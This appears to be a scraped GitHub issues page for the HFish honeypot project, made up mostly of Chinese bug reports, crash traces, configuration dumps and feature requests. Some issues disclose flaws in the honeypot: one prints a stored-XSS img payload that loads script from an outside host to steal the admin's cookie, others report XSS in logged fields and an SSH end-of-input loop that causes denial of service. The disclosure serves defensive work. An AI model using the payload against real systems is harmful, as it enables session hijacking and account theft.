hacklcx / hfish Goto Github PK
View Code? Open in Web Editor NEW安全、可靠、简单、免费的企业级蜜罐
Home Page: https://hfish.io
安全、可靠、简单、免费的企业级蜜罐
Home Page: https://hfish.io
docker包还是0.5的,能帮忙更新一下吧
1.邮件发送不可用
提示:[GIN] 2020/03/10 - 16:18:30 | 200 | 425.828µs | 10.32.166.24 | GET /get/setting/info?id=1
[HFish] 127.0.0.1 - [2020-03-10 16:18:42] 发送邮件通知失败 [EOF]
2.客户端连接正常,功能也正常,上钩列表有内容,但是分布式列表中不显示任何信息。
HFish 0.6 版本新增配置“密码脱敏符号设置”
此项为空时造成启动失败,请进行修复。
INSERT INTO hfish_setting
VALUES ('1', 'passwdTM', '', '2019-09-02 20:15:00', '0', '密码脱敏符号设置', '密码脱敏符号设置')
公司邮件系统不支持安全连接方式发送邮件,希望能增加普通邮件的发送配置
默认web蜜罐,输入xss payload,蜜罐后台查看触发payload
建议添加报表功能,比如导入ip地址和对应地区的,口令复杂一点爆破的话可以导出密码字典。
web蜜罐可以自定义页面吗?伪装成其他登陆页面
报错信息如下
redis 231
更新数据失败
panic: database is locked
goroutine 296 [running]:
HFish/error.Check(...)
/root/go/HFish/error/error.go:11
HFish/core/dbUtil.Update(0xccbb17, 0x32, 0xc0000a1f90, 0x2, 0x2, 0x0)
/root/go/HFish/core/dbUtil/dbUtil.go:89 +0x338
HFish/core/report.ReportUpdateRedis(0xc0001a91eb, 0x3, 0xc00024a980, 0xb)
/root/go/HFish/core/report/report.go:249 +0x109
created by HFish/core/protocol/redis.handleConnection.func5
/root/go/HFish/core/protocol/redis/redis.go:112 +0x23e
RT,可以溯源永恒之蓝病毒的感染机器
蜜罐通过调用js记录数据,当我们修改了api地址和key值,只需要在html页面中找到调用的js就可以找到这个两个数据值
redis 监控后台没有打印任何东西
环境:releases0.5.1 + mysql模式
建议:
1.地理位置信息可以开关设置启用禁用;
2.同IP地理位置信息不重复记录,缩小数据库大小,最好可以直接单独开表记录位置,靠ID定义;
3.SSH高交互模式参数配置可以使用变量;
4.hfish_passwd中重复的账号密码只记录一次,缩小数据库大小;
5.hfish_info中project_name最好单独开表定义名字,靠ID定义,缩小数据库大小;
6.api可以增加些查询参数,如黑名单api增加获取的时间范围,密码api增加topN查询
本人小白,目前使用起来挺舒服,已Star,希望大佬可以一直维护下去。
更新上钩信息失败 [Error 1267: Illegal mix of collations (utf8mb4_general_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation 'concat']
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in produ
ction.
[GIN-debug] Loaded HTML Templates (2):
-
- index.html
[GIN-debug] GET /static/*filepath --> HFish/vendor/github.com/gin-gon
ic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] HEAD /static/*filepath --> HFish/vendor/github.com/gin-gon
ic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] GET / --> HFish/utils/setting.RunDeep.fun
c1 (2 handlers)
[GIN-debug] POST /api/v1/post/deep_report --> HFish/view/api.ReportDeepWeb (3
handlers)
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in produ
ction.
[GIN-debug] POST /api/v1/post/plug_report --> HFish/view/api.ReportPlugWeb (3
handlers)
panic: interface conversion: interface {} is nil, not int64
goroutine 1 [running]:
HFish/utils/setting.initCahe()
/ext-go/1/src/HFish/utils/setting/setting.go:159 +0xcec
HFish/utils/setting.Run()
/ext-go/1/src/HFish/utils/setting/setting.go:392 +0xf00
main.main()
/ext-go/1/src/HFish/main.go:22 +0x1c3
该蜜罐我使用ssh启动,如何后台一直运行,退出ssh后还在线?
在反向代理使用二级目录时,绝对路径会导致一些问题,建议修改成相对路径。
如未登录情况下访问http://example.com/hfish/ 会跳转http://example.com/login 而不是http://example.com/hfish/login
页面资源也是一样的。
谢谢。
版本:v0.3
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x9bc1d0]
goroutine 11364 [running]:
sync.(*RWMutex).RLock(...)
/usr/local/go/src/sync/rwmutex.go:48
database/sql.(*Stmt).ExecContext(0x0, 0xddfbe0, 0xc000094020, 0xc00379bf90, 0x2, 0x2, 0x0, 0x0, 0x0, 0x0)
/usr/local/go/src/database/sql/sql.go:2307 +0x50
database/sql.(*Stmt).Exec(...)
/usr/local/go/src/database/sql/sql.go:2336
HFish/core/dbUtil.Update(0xcca995, 0x32, 0xc00379bf90, 0x2, 0x2, 0x0)
/ext-go/1/src/HFish/core/dbUtil/dbUtil.go:87 +0xd9
HFish/core/report.ReportUpdateSSH(0xc0002da0d4, 0x4, 0xcaa51c, 0x2)
/ext-go/1/src/HFish/core/report/report.go:227 +0x109
created by HFish/core/protocol/ssh.Start.func1
/ext-go/1/src/HFish/core/protocol/ssh/ssh.go:59 +0x5b4
在后台开个原始日志导出的功能怎么样,便于用于其他分析。
像SSH,FTP这种可以加个密码收集功能,收一波字典。
github.com/panjf2000/ants v1.2.0 使用 go mod download 下载报错,升级1.3.0后成功;但是运行代码报错,详情如下
[GIN-debug] POST /api/v1/post/plug_report --> HFish/view/api.ReportPlugWeb (3 handlers)
panic: interface conversion: interface {} is nil, not int64
goroutine 1 [running]:
HFish/utils/setting.initCahe()
E:/GoProject/src/HFish-0.5/utils/setting/setting.go:155 +0x846
HFish/utils/setting.Run()
E:/GoProject/src/HFish-0.5/utils/setting/setting.go:369 +0xec0
main.main()
E:/GoProject/src/HFish-0.5/main.go:10 +0x2d
exit status 2
强制断开后导致服务器宕机。
蜜罐的ssh服务在接受用户终端输入时未进行错误处理,导致当攻击者键入Ctrl+D (EOF)
时
line, _ = term.ReadLine()
抛出错误,但循环并未结束,因此造成死循环,无限执行
if is.Rpc() {
id = client.ReportResult("SSH", "", arr[0], info, "0")
} else {
id = strconv.FormatInt(report.ReportSSH(arr[0], "本机", info), 10)
}
造成DDOS,使蜜罐服务器拒绝服务,并在数据库中产生大量垃圾数据。
macOS Catalina 10.15.3
go1.13.4 darwin/amd64
对term.ReadLine()
做错误处理,如下:
if err != nil {
break
}
尝试 ftp 链接 出错
panic: runtime error: invalid memory address or nil pointer dereference
[signal 0xc0000005 code=0x0 addr=0x0 pc=0xa52d9e]
环境:releases 0.6 + mysql模式
当集群使用ipv6连接时,集群列表无法正确显示IP,上钩列表应该也不能正常显示IP。
建议添加修改支持,谢谢。
如按长度过滤,按是否登录成功过滤(这个比较有用,可以筛选出来成功登陆的,分析其进一步行为)
您好,我最新版本得蜜罐ssh怎么都启动不起来,docker容器和二进制得方式都试了,都是ssh不行,其它得ok,我宿主机sshd改了端口和停掉sshd服务都试了,能看看啥情况吗?
环境:
系统是纯净版最小化安装centos7,禁掉了selinux,关掉了firewalld
配置文件:
[root@hello HFish-0.3-linux-amd64]# cat config.ini
[rpc]
status = 0 # 模式 0关闭 1服务端 2客户端
addr = 127.0.0.1:7879 # RPC 服务端地址 or 客户端地址
name = Server # 状态1 服务端 名称 状态2 客户端 名称
[admin] # RPC 状态为2 集群客户端的时候 admin 可以删掉
addr = 0.0.0.0:9001 # 管理后台启动地址
account = admin # 登录账号
password = admin # 登录密码
[api]
status = 0 # 是否启动 API 0 关闭 1 启动
web_url = /api/v1/post/report # WEB蜜罐上报 API
deep_url = /api/v1/post/deep_report # 暗网蜜罐上报 API
plug_url = /api/v1/post/plug_report # 插件蜜罐上报 API
sec_key = 9cbf8a4dcb8e30682b927f352d6559a0 # API 认证秘钥
[plug]
status = 0 # 是否启动 蜜罐插件 0 关闭 1 启动, 需要先启动 API
addr = 0.0.0.0:8989 # 蜜罐插件 启动地址
[web]
status = 1 # 是否启动 WEB 1 启动 0 关闭, 启动 API 后 WEB 方可上报结果
addr = 0.0.0.0:80 # WEB 启动地址,0.0.0.0 对外开放,127.0.0.1 对内开放 可走 Nginx 反向代理
template = wordPress/html # WEB 模板路径
index = index.html # WEB 首页文件
static = wordPress/static # WEB 静态文件路径 注意:必须存在两个目录,html 文件 和静态文件 不能平级
url = / # WEB 访问目录,默认 / 可更改成 index.html index.asp index.php
[deep]
status = 1 # 是否启动 暗网 1 启动 0 关闭, 启动 API 后 方可上报结果
addr = 0.0.0.0:8080 # 暗网 WEB 启动地址
template = deep/html # 暗网 WEB 模板路径
index = index.html # 暗网 WEB 首页文件
static = deep/static # 暗网 WEB 静态文件路径 注意:必须存在两个目录,html 文件 和静态文件 不能平级
url = / # 暗网 WEB 访问目录,默认 / 可更改成 index.html index.asp index.php
[ssh]
status = 2 # 是否启动 SSH 0 关闭 1 低交互 2 高交互
addr = 0.0.0.0:22 # SSH 服务端地址 注意端口冲突,请先关闭服务器 openssh 服务 或 修改端口
[redis]
status = 1 # 是否启动 Redis 0 关闭 1 启动
addr = 0.0.0.0:6379 # Redis 服务端地址 注意端口冲突
[mysql]
status = 1 # 是否启动 Mysql 0 关闭 1 启动
addr = 0.0.0.0:3306 # Mysql 服务端地址 注意端口冲突
files = /etc/passwd,/etc/group # Mysql 服务端读取客户端任意文件; 多写逗号分隔,会随机取
[telnet]
status = 1 # 是否启动 Telnet 0 关闭 1 启动
addr = 0.0.0.0:23 # Telnet 服务端地址 注意端口冲突
[ftp]
status = 1 # 是否启动 Ftp 0 关闭 1 启动
addr = 0.0.0.0:21 # Ftp 服务端地址 注意端口冲突
[mem_cache]
status = 1 # 是否启动 MemCache 0 关闭 1 启动
addr = 0.0.0.0:11211 # Memcache 服务端地址 注意端口冲突
rate_limit = 4 # 每秒响应次数
[root@hello HFish-0.3-linux-amd64]#
启动日志:
[root@hello HFish-0.3-linux-amd64]# ./HFish run
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
2019/09/05 15:38:03 [Memcache TCP] Listning on 0.0.0.0:11211
[GIN-debug] Loaded HTML Templates (2):
-
- index.html
[GIN-debug] GET /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] HEAD /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] GET / --> HFish/utils/setting.RunWeb.func1 (2 handlers)
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
[GIN-debug] Loaded HTML Templates (2):
-
- index.html
[GIN-debug] GET /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] HEAD /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] GET / --> HFish/utils/setting.RunDeep.func1 (2 handlers)
[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
[GIN-debug] Loaded HTML Templates (11):
- colony.html
- footer.html
- footer
- header
- login.html
- mail.html
-
- dashboard.html
- fish.html
- header.html
- setting.html
[GIN-debug] GET /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (5 handlers)
[GIN-debug] HEAD /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (5 handlers)
[GIN-debug] GET /login --> HFish/view/login.Html (5 handlers)
[GIN-debug] POST /login --> HFish/view/login.Login (5 handlers)
[GIN-debug] GET /logout --> HFish/view/login.Logout (5 handlers)
[GIN-debug] GET / --> HFish/view/dashboard.Html (6 handlers)
[GIN-debug] GET /dashboard --> HFish/view/dashboard.Html (6 handlers)
[GIN-debug] GET /get/dashboard/data --> HFish/view/dashboard.GetFishData (6 handlers)
[GIN-debug] GET /get/dashboard/pie_data --> HFish/view/dashboard.GetFishPieData (6 handlers)
[GIN-debug] GET /fish --> HFish/view/fish.Html (6 handlers)
[GIN-debug] GET /get/fish/list --> HFish/view/fish.GetFishList (6 handlers)
[GIN-debug] GET /get/fish/info --> HFish/view/fish.GetFishInfo (6 handlers)
[GIN-debug] GET /get/fish/typeList --> HFish/view/fish.GetFishTypeInfo (6 handlers)
[GIN-debug] POST /post/fish/del --> HFish/view/fish.PostFishDel (6 handlers)
[GIN-debug] GET /colony --> HFish/view/colony.Html (6 handlers)
[GIN-debug] GET /get/colony/list --> HFish/view/colony.GetColony (6 handlers)
[GIN-debug] POST /post/colony/del --> HFish/view/colony.PostColonyDel (6 handlers)
[GIN-debug] GET /mail --> HFish/view/mail.Html (6 handlers)
[GIN-debug] POST /post/mail/sendEmail --> HFish/view/mail.SendEmailToUsers (6 handlers)
[GIN-debug] GET /setting --> HFish/view/setting.Html (6 handlers)
[GIN-debug] GET /get/setting/info --> HFish/view/setting.GetSettingInfo (6 handlers)
[GIN-debug] POST /post/setting/update --> HFish/view/setting.UpdateEmailInfo (6 handlers)
[GIN-debug] POST /post/setting/updateAlertMail --> HFish/view/setting.UpdateAlertMail (6 handlers)
[GIN-debug] POST /post/setting/checkSetting --> HFish/view/setting.UpdateStatusSetting (6 handlers)
[GIN-debug] POST /post/setting/updateWebHook --> HFish/view/setting.UpdateWebHook (6 handlers)
[GIN-debug] POST /post/setting/updateWhiteIp --> HFish/view/setting.UpdateWhiteIp (6 handlers)
[GIN-debug] GET /api/v1/get/ip --> HFish/view/api.GetIpList (6 handlers)
[GIN-debug] GET /api/v1/get/fish_info --> HFish/view/api.GetFishInfo (6 handlers)
我好像是上个月前在我另一台vps上测试得是好用得那时候不知道是哪个版本了,这次用的最新版本,没测试老版本。
tail: hfish.log: file truncated
[HFish] 127.0.0.1 - [2020-03-11 16:21:28] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:30] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:31] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:32] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:50] WebHook 调用成功 []
记录的命令在后台显示存在xss
hi 很抱歉打扰你们。我在用docker构建后,并没有像 /hfish/:/opt/HFish/ 整个目录。。而是 仅仅映射 /hfish/config.ini:/opt/HFish/config.ini 但貌似这样,docker启动后则报 ./HFish not found,说明目录被清空了。希望可以得到答复。
假设有个 ip 频繁访问服务器,可以用这个项目做什么吗?有什么具体的样例呢?
打开配置文件失败 [open ./config.ini: no such file or directory]
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x58 pc=0xa2046e]
已下载 HFish-0.6.3-linux-amd64.tar.gz
cd HFish-0.6.3-linux-amd64
./HFish run
hi! hacklcx!!! When I simulated the process of using docker to build HFish quickly in a public network server, I found unexpected problems with JS in the WEB project.
docker exec -it hfish /bin/sh
cat config.ini
[api]
status = 1 # 是否启动 API 1 启动 0 关闭
web_url = /api/v1/post/report # 管理后台启动地址
deep_url = /api/v1/post/deep_report # 管理后台启动地址
Than error show that:
cat x.js
function report() {
var login_field = $("#user_login").val();
var password = $("#user_pass").val();
$.ajax({
type: "POST",
url: "http://localhost:9001/api/v1/post/dart_report",
In branch dev deep_report
= dart_report
, so an Api about dart_report not found.
But the problem has been fixed in branch master
I recommend using master
to build docker image
如果要在外部进行连接时觉得更逼真的话,应该在最初进行连接的时候,加入一点点的随机延迟。比如:time.Sleep(time.Millisecond * time.Duration(rand.Intn(300)))
以上来自实际使用的一点体验。
If you want to make the connection more realistic, there should be a little delay, random delay. Now the result's returning too fast.
This is the experience from actual use.
In any phishing interface, where the password needs to be entered, the use of img tags can cause XSS attacks.
Insert XSS payload where the password is entered
XSS code is triggered when the administrator views the information
Use the following code to get a cookie.
<img src=a onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974" height="0" width="0">
我升成3.1发现 本地测试记录不了mysql ssh telnet等行为,还没排查问题在哪了,测试环境docker debian
启动直接崩溃,运行环境2核2g centos 7 0.3.2版本二进制运行
2019/10/11 13:22:34 worker exits from a panic: runtime error: invalid memory address or nil pointer dereference
2019/10/11 13:22:34 worker exits from a panic: runtime error: invalid memory address or nil pointer dereference
2019/10/11 13:22:34 worker exits from panic: goroutine 68 [running]:
HFish/vendor/github.com/panjf2000/ants.(*Worker).run.func1.1(0xc0005fd650)
/ext-go/1/src/HFish/vendor/github.com/panjf2000/ants/worker.go:59 +0x13e
panic(0xc571c0, 0x15d8330)
/usr/local/go/src/runtime/panic.go:522 +0x1b5
HFish/core/protocol/mysql.Start.func1()
/ext-go/1/src/HFish/core/protocol/mysql/mysql.go:66 +0x12e
HFish/vendor/github.com/panjf2000/ants.(*Worker).run.func1(0xc0005fd650)
/ext-go/1/src/HFish/vendor/github.com/panjf2000/ants/worker.go:71 +0x9b
created by HFish/vendor/github.com/panjf2000/ants.(*Worker).run
/ext-go/1/src/HFish/vendor/github.com/panjf2000/ants/worker.go:49 +0x4d
web蜜罐的static/x.js上报的数据包中name参数存在xss问题。
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.